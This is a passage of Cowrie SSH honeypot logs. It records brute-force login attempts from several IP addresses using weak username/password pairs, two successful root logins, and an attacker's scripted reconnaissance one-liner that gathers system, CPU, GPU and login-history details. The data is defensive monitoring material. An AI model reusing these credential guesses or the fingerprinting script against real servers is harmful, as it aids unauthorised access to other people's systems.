S":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:58:32.012712Z","src_ip":"212.227.125.160","session":"65b148d0bcaa"}
{"eventid":"cowrie.login.failed","username":"debian","password":"123456789","message":"login attempt [debian/123456789] failed","sensor":"my-vps","timestamp":"2025-08-26T11:58:32.172891Z","src_ip":"212.227.125.160","session":"65b148d0bcaa"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:58:33.256705Z","src_ip":"212.227.125.160","session":"65b148d0bcaa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52048,"dst_ip":"1.2.3.4","dst_port":22,"session":"4bc6a6fb4dd3","protocol":"ssh","message":"New connection: 212.227.125.160:52048 (1.2.3.4:22) [session: 4bc6a6fb4dd3]","sensor":"my-vps","timestamp":"2025-08-26T11:58:33.796217Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:58:33.797104Z","src_ip":"212.227.125.160","session":"4bc6a6fb4dd3"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:58:33.847877Z","src_ip":"212.227.125.160","session":"4bc6a6fb4dd3"}
{"eventid":"cowrie.login.failed","username":"solv","password":"Aa123456","message":"login attempt [solv/Aa123456] failed","sensor":"my-vps","timestamp":"2025-08-26T11:58:34.002210Z","src_ip":"212.227.125.160","session":"4bc6a6fb4dd3"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:58:35.206754Z","src_ip":"212.227.125.160","session":"4bc6a6fb4dd3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56176,"dst_ip":"1.2.3.4","dst_port":22,"session":"9c88f1db3b35","protocol":"ssh","message":"New connection: 212.227.125.160:56176 (1.2.3.4:22) [session: 9c88f1db3b35]","sensor":"my-vps","timestamp":"2025-08-26T11:58:37.798599Z"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":35108,"dst_ip":"1.2.3.4","dst_port":22,"session":"d5d597ce597c","protocol":"ssh","message":"New connection: 83.168.105.65:35108 (1.2.3.4:22) [session: d5d597ce597c]","sensor":"my-vps","timestamp":"2025-08-26T11:58:37.803480Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:58:37.804212Z","src_ip":"83.168.105.65","session":"d5d597ce597c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:58:37.840436Z","src_ip":"83.168.105.65","session":"d5d597ce597c"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"123456","message":"login attempt [hadoop/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T11:58:37.950930Z","src_ip":"83.168.105.65","session":"d5d597ce597c"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:58:38.010364Z","src_ip":"212.227.125.160","session":"9c88f1db3b35"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:58:38.011032Z","src_ip":"212.227.125.160","session":"9c88f1db3b35"}
{"eventid":"cowrie.login.failed","username":"library-koha","password":"library-koha","message":"login attempt [library-koha/library-koha] failed","sensor":"my-vps","timestamp":"2025-08-26T11:58:38.714263Z","src_ip":"212.227.125.160","session":"9c88f1db3b35"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:58:38.988515Z","src_ip":"83.168.105.65","session":"d5d597ce597c"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:58:39.782261Z","src_ip":"212.227.125.160","session":"9c88f1db3b35"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56954,"dst_ip":"1.2.3.4","dst_port":22,"session":"003abc56d034","protocol":"ssh","message":"New connection: 212.227.125.160:56954 (1.2.3.4:22) [session: 003abc56d034]","sensor":"my-vps","timestamp":"2025-08-26T11:58:47.042990Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:58:47.062163Z","src_ip":"212.227.125.160","session":"003abc56d034"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:58:47.464173Z","src_ip":"212.227.125.160","session":"003abc56d034"}
{"eventid":"cowrie.login.success","username":"root","password":"1","message":"login attempt [root/1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:58:47.779471Z","src_ip":"212.227.125.160","session":"003abc56d034"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:58:48.960501Z","src_ip":"212.227.125.160","session":"003abc56d034"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T11:58:48.961185Z","src_ip":"212.227.125.160","session":"003abc56d034"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:58:49.403687Z","src_ip":"212.227.125.160","session":"003abc56d034"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:58:49.404777Z","src_ip":"212.227.125.160","session":"003abc56d034"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57720,"dst_ip":"1.2.3.4","dst_port":22,"session":"1531313da16d","protocol":"ssh","message":"New connection: 212.227.125.160:57720 (1.2.3.4:22) [session: 1531313da16d]","sensor":"my-vps","timestamp":"2025-08-26T11:58:49.918732Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:58:50.325790Z","src_ip":"212.227.125.160","session":"1531313da16d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:58:50.326510Z","src_ip":"212.227.125.160","session":"1531313da16d"}
{"eventid":"cowrie.login.failed","username":"srikanth","password":"srikanth","message":"login attempt [srikanth/srikanth] failed","sensor":"my-vps","timestamp":"2025-08-26T11:58:51.581263Z","src_ip":"212.227.125.160","session":"1531313da16d"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:58:52.634097Z","src_ip":"212.227.125.160","session":"1531313da16d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35336,"dst_ip":"1.2.3.4","dst_port":22,"session":"a4edbfb17249","protocol":"ssh","message":"New connection: 212.227.235.229:35336 (1.2.3.4:22) [session: a4edbfb17249]","sensor":"my-vps","timestamp":"2025-08-26T11:58:52.667932Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:58:52.777546Z","src_ip":"212.227.235.229","session":"a4edbfb17249"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T11:58:52.778406Z","src_ip":"212.227.235.229","session":"a4edbfb17249"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":45278,"dst_ip":"1.2.3.4","dst_port":22,"session":"6bb650ca20dc","protocol":"ssh","message":"New connection: 83.168.105.65:45278 (1.2.3.4:22) [session: 6bb650ca20dc]","sensor":"my-vps","timestamp":"2025-08-26T11:58:53.147995Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:58:53.148887Z","src_ip":"83.168.105.65","session":"6bb650ca20dc"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:58:53.185817Z","src_ip":"83.168.105.65","session":"6bb650ca20dc"}
{"eventid":"cowrie.login.failed","username":"tools","password":"tools123","message":"login attempt [tools/tools123] failed","sensor":"my-vps","timestamp":"2025-08-26T11:58:53.298705Z","src_ip":"83.168.105.65","session":"6bb650ca20dc"}
{"eventid":"cowrie.login.success","username":"root","password":"admin123","message":"login attempt [root/admin123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:58:53.614639Z","src_ip":"212.227.235.229","session":"a4edbfb17249"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:58:54.338744Z","src_ip":"83.168.105.65","session":"6bb650ca20dc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:58:54.468300Z","src_ip":"212.227.235.229","session":"a4edbfb17249"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-26T11:58:54.469019Z","src_ip":"212.227.235.229","session":"a4edbfb17249"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T11:58:54.469682Z","src_ip":"212.227.235.229","session":"a4edbfb17249"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T11:58:54.471019Z","src_ip":"212.227.235.229","session":"a4edbfb17249"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-26T11:58:54.472418Z","src_ip":"212.227.235.229","session":"a4edbfb17249"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T11:58:54.473163Z","src_ip":"212.227.235.229","session":"a4edbfb17249"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T11:58:54.473893Z","src_ip":"212.227.235.229","session":"a4edbfb17249"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-26T11:58:54.474762Z","src_ip":"212.227.235.229","session":"a4edbfb17249"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-26T11:58:54.475365Z","src_ip":"212.227.235.229","session":"a4edbfb17249"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T11:58:54.475907Z","src_ip":"212.227.235.229","session":"a4edbfb17249"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T11:58:54.476387Z","src_ip":"212.227.235.229","session":"a4edbfb17249"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T11:58:54.476938Z","src_ip":"212.227.235.229","session":"a4edbfb17249"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T11:58:54.477406Z","src_ip":"212.227.235.229","session":"a4edbfb17249"}
